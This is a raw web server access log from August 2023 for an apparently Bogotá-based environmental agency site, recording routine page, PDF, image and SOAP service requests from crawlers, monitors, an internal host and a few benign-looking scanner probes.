186.118.160.253 - - [14/Aug/2023:02:11:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.245.192.253 - - [14/Aug/2023:02:11:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:02:10:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:11:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:02:13:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:13:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62795
40.77.167.208 - - [14/Aug/2023:02:16:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:02:16:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:02:16:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:02:18:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:02:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43839
201.245.192.253 - - [14/Aug/2023:02:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41260
172.22.2.4 - - [14/Aug/2023:02:17:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
201.245.192.253 - - [14/Aug/2023:02:21:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.48 - - [14/Aug/2023:02:21:06 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60692
52.167.144.153 - - [14/Aug/2023:02:23:05 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.167.208 - - [14/Aug/2023:02:23:09 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.167.208 - - [14/Aug/2023:02:23:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.77.167.208 - - [14/Aug/2023:02:23:10 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
216.245.221.92 - - [14/Aug/2023:02:23:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:22:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
113.207.1.133 - - [14/Aug/2023:02:24:22 -0500] "GET /galeria/galeria/fotos/mirador4P.jpg HTTP/1.1" 200 11757
172.22.2.4 - - [14/Aug/2023:02:23:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
172.22.2.4 - - [14/Aug/2023:02:25:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
162.55.43.55 - - [14/Aug/2023:02:26:03 -0500] "GET / HTTP/1.1" 200 4720
162.55.43.55 - - [14/Aug/2023:02:26:04 -0500] "GET / HTTP/1.1" 200 319
168.119.100.88 - - [14/Aug/2023:02:26:14 -0500] "GET / HTTP/1.1" 200 319
168.119.100.88 - - [14/Aug/2023:02:26:15 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [14/Aug/2023:02:26:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:02:28:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:02:28:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43839
201.245.192.253 - - [14/Aug/2023:02:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41260
172.22.2.4 - - [14/Aug/2023:02:28:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54597
172.22.2.4 - - [14/Aug/2023:02:29:48 -0500] "OPTIONS /BLA/boletinlegal/ HTTP/1.1" 200 40907
211.130.63.227 - - [14/Aug/2023:02:31:12 -0500] "GET /galeria/galeria/fotos/Entrenube4P.jpg HTTP/1.1" 200 10881
201.245.192.253 - - [14/Aug/2023:02:31:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:02:33:15 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.6 - - [14/Aug/2023:02:34:43 -0500] "GET /images/avistamiento-aves.jpg HTTP/1.1" 200 104313
173.252.107.10 - - [14/Aug/2023:02:34:46 -0500] "GET /images/Caminatas-ecologicas-julio.jpg HTTP/1.1" 200 480557
173.252.107.3 - - [14/Aug/2023:02:34:46 -0500] "GET /images/construccion-sostenible-.jpg HTTP/1.1" 200 82949
172.22.2.4 - - [14/Aug/2023:02:34:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [14/Aug/2023:02:36:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.192 - - [14/Aug/2023:02:37:12 -0500] "GET /por-un-corazon-mas-verde-del-1-al-9-de-junio-se-celebrara-la-semana-ambiental-2023-en-bogota.html HTTP/1.1" 200 819
172.22.2.4 - - [14/Aug/2023:02:37:50 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [14/Aug/2023:02:38:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:38:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [14/Aug/2023:02:38:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43839
201.245.192.253 - - [14/Aug/2023:02:38:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [14/Aug/2023:02:38:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41260
172.22.2.4 - - [14/Aug/2023:02:37:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60342
172.22.2.4 - - [14/Aug/2023:02:39:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:02:41:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.153 - - [14/Aug/2023:02:41:48 -0500] "GET /BLA/resoluciones/AUTOS%202014/4227.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2023:02:40:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52656
216.245.221.92 - - [14/Aug/2023:02:43:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:02:46:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:02:45:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:46:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [14/Aug/2023:02:48:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.6 - - [14/Aug/2023:02:48:49 -0500] "GET /Publicaciones/2023EE167378.pdf HTTP/1.1" 404 228
52.167.144.219 - - [14/Aug/2023:02:50:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2944.pdf HTTP/1.1" 200 472171
201.245.192.253 - - [14/Aug/2023:02:51:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:02:51:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:02:53:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:52:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [14/Aug/2023:02:56:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.219 - - [14/Aug/2023:02:56:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/2105.pdf HTTP/1.1" 200 364068
216.245.221.92 - - [14/Aug/2023:02:58:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:57:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:02:58:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47863
172.22.2.4 - - [14/Aug/2023:02:58:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47863
201.245.192.253 - - [14/Aug/2023:03:01:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.78 - - [14/Aug/2023:03:01:44 -0500] "GET /BLA/resoluciones/AUTOS%202013/3410.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Aug/2023:03:03:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:03:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:04:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
172.22.2.4 - - [14/Aug/2023:03:05:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [14/Aug/2023:03:06:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.215 - - [14/Aug/2023:03:07:30 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Aug/2023:03:08:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:09:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.78 - - [14/Aug/2023:03:11:14 -0500] "GET /BLA/resoluciones/AUTOS%202022/1326.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:03:11:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:09:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59699
216.245.221.92 - - [14/Aug/2023:03:13:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:03:16:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:14:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:15:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:03:18:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:03:18:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43360
201.245.192.253 - - [14/Aug/2023:03:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41570
191.156.144.161 - - [14/Aug/2023:03:21:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.144.161 - - [14/Aug/2023:03:21:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.144.179 - - [14/Aug/2023:03:21:25 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [14/Aug/2023:03:21:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:20:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:03:23:15 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.208 - - [14/Aug/2023:03:25:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/6328.pdf HTTP/1.1" 200 401661
201.245.192.253 - - [14/Aug/2023:03:26:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:26:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2023:03:28:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:03:28:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43360
201.245.192.253 - - [14/Aug/2023:03:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41570
172.22.2.4 - - [14/Aug/2023:03:29:00 -0500] "HEAD /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6328
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/signo-mas.gif HTTP/1.1" 200 13689
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/signo-menos.gif HTTP/1.1" 200 13454
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/nuevo.gif HTTP/1.1" 200 26475
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/img_3.jpg HTTP/1.1" 200 1841
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2023:03:29:01 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1336
172.22.2.4 - - [14/Aug/2023:03:27:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
172.22.2.4 - - [14/Aug/2023:03:29:11 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6328
172.22.2.4 - - [14/Aug/2023:03:29:29 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=mas HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:29 -0500] "GET /BLA/boletinlegal/images/docs.png HTTP/1.1" 200 10288
172.22.2.4 - - [14/Aug/2023:03:29:29 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:29:35 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6328
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/signo-mas.gif HTTP/1.1" 200 13689
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/signo-menos.gif HTTP/1.1" 200 13454
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/nuevo.gif HTTP/1.1" 200 26475
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/img_3.jpg HTTP/1.1" 200 1841
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Aug/2023:03:29:37 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Aug/2023:03:29:39 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:40 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:41 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=mas HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:44 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:45 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:29:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1240
172.22.2.4 - - [14/Aug/2023:03:29:47 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=mas HTTP/1.1" 200 251375
172.22.2.4 - - [14/Aug/2023:03:30:51 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/Aug/2023:03:30:52 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/Aug/2023:03:31:17 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6328
172.22.2.4 - - [14/Aug/2023:03:31:19 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=menos HTTP/1.1" 200 251375
201.245.192.253 - - [14/Aug/2023:03:31:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:31:31 -0500] "GET /BLA/boletinlegal/consulta.php?ordenar=mas HTTP/1.1" 200 251375
52.167.144.78 - - [14/Aug/2023:03:32:45 -0500] "GET /BLA/resoluciones/AUTOS%202022/3034.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Aug/2023:03:33:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.92.194 - - [14/Aug/2023:03:33:52 -0500] "GET /bogota-empieza-la-consolidacion-de-la-estrategia-de-bosques-urbanos-con-el-brazo-salitre-en-barrios-unidos.html?utm_source=Youtube_DIGI&utm_medium=CPV&utm_campaign=BosquesUrbanos&utm_id=Agosto_2023 HTTP/1.1" 200 892
172.22.2.4 - - [14/Aug/2023:03:32:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:33:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
35.203.30.121 - - [14/Aug/2023:03:35:53 -0500] "\x16\x03\x01" 400 226
35.203.30.121 - - [14/Aug/2023:03:35:55 -0500] "OPTIONS / HTTP/1.0" 200 -
172.22.2.4 - - [14/Aug/2023:03:36:13 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
201.245.192.253 - - [14/Aug/2023:03:36:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.78 - - [14/Aug/2023:03:38:06 -0500] "GET /Publicaciones/2023EE132560.pdf HTTP/1.1" 404 228
216.245.221.92 - - [14/Aug/2023:03:38:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:03:38:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43360
201.245.192.253 - - [14/Aug/2023:03:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41570
172.22.2.4 - - [14/Aug/2023:03:38:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:40:11 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Aug/2023:03:40:12 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
172.22.2.4 - - [14/Aug/2023:03:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
201.245.192.253 - - [14/Aug/2023:03:41:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Aug/2023:03:43:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:44:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2023:03:46:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:44:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [14/Aug/2023:03:48:15 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.208 - - [14/Aug/2023:03:48:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0208.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:03:51:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:49:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:50:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:03:53:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.193 - - [14/Aug/2023:03:53:17 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.193 - - [14/Aug/2023:03:53:17 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:03:56:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Aug/2023:03:55:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:56:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [14/Aug/2023:03:58:15 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2023:03:58:25 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Aug/2023:03:58:25 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 200 252981
52.167.144.222 - - [14/Aug/2023:04:00:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0506.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2023:04:01:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
206.189.57.162 - - [14/Aug/2023:04:02:23 -0500] "GET /aaa9 HTTP/1.1" 404 1018
206.189.57.162 - - [14/Aug/2023:04:02:34 -0500] "GET /aab8 HTTP/1.1" 404 1018
206.189.57.162 - - [14/Aug/2023:04:02:55 -0500] "GET / HTTP/1.1" 200 319
